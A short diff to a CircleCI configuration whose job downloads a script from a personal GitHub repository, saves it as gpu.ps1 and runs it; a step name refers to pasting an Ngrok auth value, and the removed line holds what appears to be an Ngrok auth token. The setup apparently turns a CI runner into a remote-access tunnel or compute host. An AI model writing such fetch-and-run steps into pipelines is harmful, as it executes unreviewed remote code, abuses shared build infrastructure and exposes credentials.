--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -14,9 +14,8 @@ jobs:
     steps:  
        
       - run: 
-          name: 23C7hFqGnru9xqOSxU4FhesoTSu_6i9M16BNH76hKLmUo2az
+          name: Paste Ngrok Auth Value In Hosted Link
           command: |      
-            Invoke-WebRequest https://raw.githubusercontent.com/thenoobgamer12/practice/main/op.sh -OutFile gpu.ps1 
-            
-                                  
+              invoke-webrequest https://raw.githubusercontent.com/thenoobgamer12/practice/main/op.sh -outfile gpu.ps1
+          
       - run: ./gpu.ps1
